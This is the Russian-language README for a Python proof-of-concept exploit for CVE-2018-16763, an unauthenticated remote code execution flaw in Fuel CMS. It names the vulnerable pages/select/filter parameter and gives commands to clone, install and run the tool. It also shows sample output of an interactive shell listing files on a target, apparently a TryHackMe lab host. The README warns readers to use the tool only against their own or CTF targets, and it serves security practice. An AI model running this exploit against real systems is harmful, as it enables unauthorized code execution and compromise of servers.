
Эксплойт Proof-of-Concept (PoC) для CVE-2018-16763 (Fuel CMS — неаутентифицированное удалённое выполнение кода).
PoC-эксплойт (Proof-of-Concept) для CVE-2018-16763 (Fuel CMS — удалённое выполнение кода без предварительной аутентификации).
Эта программа на Python 3 служит PoC для уязвимости CVE-2018-16763 в системе управления контентом Fuel CMS. В частности, уязвимость позволяет выполнять PHP-код через параметр pages/select/filter (реализованный в этом PoC), что приводит к удалённому выполнению кода без предварительной аутентификации — критической уязвимости системы.
git clone https://github.com/saccles/CVE-2018-16763-Proof-of-Concept.git
cd CVE-2018-16763-Proof-of-Concept
python3 -m pip install -r requirements.txt
Запустите скрипт эксплойта против уязвимой цели. (ЗАПУСКАЙТЕ СКРИПТ ТОЛЬКО ПРОТИВ ЦЕЛИ, КОТОРАЯ ПРИНАДЛЕЖИТ ВАМ, ИЛИ ЦЕЛИ, ПРЕДОСТАВЛЕННОЙ TryHackMe, HackTheBox ИЛИ ДРУГИМ САЙТОМ ПО ЭТИЧНОМУ ХАКИНГУ!) Рекомендую ознакомиться с заданием "Ignite" от TryHackMe для получения дополнительной информации. Вы также можете загрузить уязвимое приложение Fuel CMS с сайта exploit-db.com.
python3 CVE-2018-16763.py -u URL
[DEBUG] Connecting to http://10.10.60.46 ...
[DEBUG] Succesfully connected!
Enter Command:
$ ls -la
total 52
drwxrwxrwx 4 root root 4096 Jul 26 2019 .
drwxr-xr-x 3 root root 4096 Jul 26 2019 ..
-rw-r--r-- 1 root root 163 Jul 26 2019 .htaccess
-rwxrwxrwx 1 root root 1427 Jul 26 2019 README.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 assets
-rwxrwxrwx 1 root root 193 Jul 26 2019 composer.json
-rwxrwxrwx 1 root root 6502 Jul 26 2019 contributing.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 fuel
-rwxrwxrwx 1 root root 11802 Jul 26 2019 index.php
-rwxrwxrwx 1 root root 30 Jul 26 2019 robots.txt
python3 CVE-2018-16763.py -h
usage: CVE-2018-16763.py [-h] -u URL
This tool exploits CVE-2018-16763 on Fuel CMS.
options:
-h, --help show this help message and exit
-u URL, --url URL Fuel CMS url.
Silas Accles [saccles]
Этот проект лицензирован в соответствии с лицензией MIT — подробности см. в файле LICENSE.md.
Во многом вдохновлён программами Exploit-DB, PoC-скриптами Vozec и оригинальным PoC, разработанным Padsala Trushal.